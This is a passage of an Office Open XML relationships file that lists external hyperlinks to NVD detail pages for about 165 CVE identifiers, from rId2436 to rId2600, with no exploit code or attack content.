TargetMode="External" Id="rId2436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-46418" TargetMode="External" Id="rId2437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16313" TargetMode="External" Id="rId2438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18621" TargetMode="External" Id="rId2439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19387" TargetMode="External" Id="rId2440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19869" TargetMode="External" Id="rId2441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38822" TargetMode="External" Id="rId2442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39924" TargetMode="External" Id="rId2443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42804" TargetMode="External" Id="rId2444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47666" TargetMode="External" Id="rId2445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48766" TargetMode="External" Id="rId2446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48767" TargetMode="External" Id="rId2447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49222" TargetMode="External" Id="rId2448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49223" TargetMode="External" Id="rId2449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49227" TargetMode="External" Id="rId2450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53635" TargetMode="External" Id="rId2451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53958" TargetMode="External" Id="rId2452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54245" TargetMode="External" Id="rId2453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55532" TargetMode="External" Id="rId2454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55643" TargetMode="External" Id="rId2455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5846" TargetMode="External" Id="rId2456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65822" TargetMode="External" Id="rId2457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65935" TargetMode="External" Id="rId2458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68900" TargetMode="External" Id="rId2459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69257" TargetMode="External" Id="rId2460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70454" TargetMode="External" Id="rId2461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70474" TargetMode="External" Id="rId2462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71048" TargetMode="External" Id="rId2463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71327" TargetMode="External" Id="rId2464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72835" TargetMode="External" Id="rId2465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73083" TargetMode="External" Id="rId2466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73264" TargetMode="External" Id="rId2467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73313" TargetMode="External" Id="rId2468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73408" TargetMode="External" Id="rId2469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73611" TargetMode="External" Id="rId2470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77110" TargetMode="External" Id="rId2471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77368" TargetMode="External" Id="rId2472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79639" TargetMode="External" Id="rId2473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79749" TargetMode="External" Id="rId2474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80182" TargetMode="External" Id="rId2475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82020" TargetMode="External" Id="rId2476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId2477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85197" TargetMode="External" Id="rId2478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85221" TargetMode="External" Id="rId2479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85533" TargetMode="External" Id="rId2480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-44319" TargetMode="External" Id="rId2481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-44320" TargetMode="External" Id="rId2482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-23173" TargetMode="External" Id="rId2483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48431" TargetMode="External" Id="rId2484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51675" TargetMode="External" Id="rId2485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-52182" TargetMode="External" Id="rId2486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61478" TargetMode="External" Id="rId2487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61479" TargetMode="External" Id="rId2488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61480" TargetMode="External" Id="rId2489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61726" TargetMode="External" Id="rId2490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-63913" TargetMode="External" Id="rId2491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-69223" TargetMode="External" Id="rId2492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70147" TargetMode="External" Id="rId2493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70148" TargetMode="External" Id="rId2494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70962" TargetMode="External" Id="rId2495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0860" TargetMode="External" Id="rId2496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12151" TargetMode="External" Id="rId2497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12483" TargetMode="External" Id="rId2498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13297" TargetMode="External" Id="rId2499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13676" TargetMode="External" Id="rId2500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14164" TargetMode="External" Id="rId2501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14296" TargetMode="External" Id="rId2502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14444" TargetMode="External" Id="rId2503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14957" TargetMode="External" Id="rId2504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15019" TargetMode="External" Id="rId2505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-1519" TargetMode="External" Id="rId2506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15406" TargetMode="External" Id="rId2507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15462" TargetMode="External" Id="rId2508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15667" TargetMode="External" Id="rId2509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15816" TargetMode="External" Id="rId2510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16025" TargetMode="External" Id="rId2511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16028" TargetMode="External" Id="rId2512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16037" TargetMode="External" Id="rId2513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16497" TargetMode="External" Id="rId2514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16960" TargetMode="External" Id="rId2515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17255" TargetMode="External" Id="rId2516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17470" TargetMode="External" Id="rId2517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18056" TargetMode="External" Id="rId2518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18175" TargetMode="External" Id="rId2519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18355" TargetMode="External" Id="rId2520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18453" TargetMode="External" Id="rId2521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18561" TargetMode="External" Id="rId2522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18611" TargetMode="External" Id="rId2523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18649" TargetMode="External" Id="rId2524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18672" TargetMode="External" Id="rId2525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18907" TargetMode="External" Id="rId2526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19080" TargetMode="External" Id="rId2527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19205" TargetMode="External" Id="rId2528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19300" TargetMode="External" Id="rId2529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19305" TargetMode="External" Id="rId2530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19436" TargetMode="External" Id="rId2531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19439" TargetMode="External" Id="rId2532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19534" TargetMode="External" Id="rId2533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19654" TargetMode="External" Id="rId2534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19858" TargetMode="External" Id="rId2535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21728" TargetMode="External" Id="rId2536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22591" TargetMode="External" Id="rId2537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23490" TargetMode="External" Id="rId2538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24301" TargetMode="External" Id="rId2539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25639" TargetMode="External" Id="rId2540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25679" TargetMode="External" Id="rId2541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26278" TargetMode="External" Id="rId2542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26456" TargetMode="External" Id="rId2543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27137" TargetMode="External" Id="rId2544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27462" TargetMode="External" Id="rId2545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27490" TargetMode="External" Id="rId2546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27889" TargetMode="External" Id="rId2547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28604" TargetMode="External" Id="rId2548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29074" TargetMode="External" Id="rId2549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29181" TargetMode="External" Id="rId2550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29785" TargetMode="External" Id="rId2551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3039" TargetMode="External" Id="rId2552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30866" TargetMode="External" Id="rId2553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30922" TargetMode="External" Id="rId2554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3174" TargetMode="External" Id="rId2555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32280" TargetMode="External" Id="rId2556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32283" TargetMode="External" Id="rId2557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32285" TargetMode="External" Id="rId2558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32286" TargetMode="External" Id="rId2559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32597" TargetMode="External" Id="rId2560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33216" TargetMode="External" Id="rId2561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33218" TargetMode="External" Id="rId2562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33231" TargetMode="External" Id="rId2563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33487" TargetMode="External" Id="rId2564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33630" TargetMode="External" Id="rId2565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33811" TargetMode="External" Id="rId2566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33814" TargetMode="External" Id="rId2567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33870" TargetMode="External" Id="rId2568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33894" TargetMode="External" Id="rId2569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34355" TargetMode="External" Id="rId2570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34986" TargetMode="External" Id="rId2571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35172" TargetMode="External" Id="rId2572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37198" TargetMode="External" Id="rId2573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37237" TargetMode="External" Id="rId2574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37736" TargetMode="External" Id="rId2575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38344" TargetMode="External" Id="rId2576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38346" TargetMode="External" Id="rId2577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38347" TargetMode="External" Id="rId2578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38348" TargetMode="External" Id="rId2579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38349" TargetMode="External" Id="rId2580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38350" TargetMode="External" Id="rId2581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38636" TargetMode="External" Id="rId2582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38638" TargetMode="External" Id="rId2583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39820" TargetMode="External" Id="rId2584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39829" TargetMode="External" Id="rId2585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41602" TargetMode="External" Id="rId2586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42151" TargetMode="External" Id="rId2587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42154" TargetMode="External" Id="rId2588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42499" TargetMode="External" Id="rId2589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42536" TargetMode="External" Id="rId2590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42587" TargetMode="External" Id="rId2591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43003" TargetMode="External" Id="rId2592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44250" TargetMode="External" Id="rId2593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44486" TargetMode="External" Id="rId2594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44488" TargetMode="External" Id="rId2595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44496" TargetMode="External" Id="rId2596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44673" TargetMode="External" Id="rId2597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44890" TargetMode="External" Id="rId2598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44893" TargetMode="External" Id="rId2599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45103" TargetMode="External" Id="rId2600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 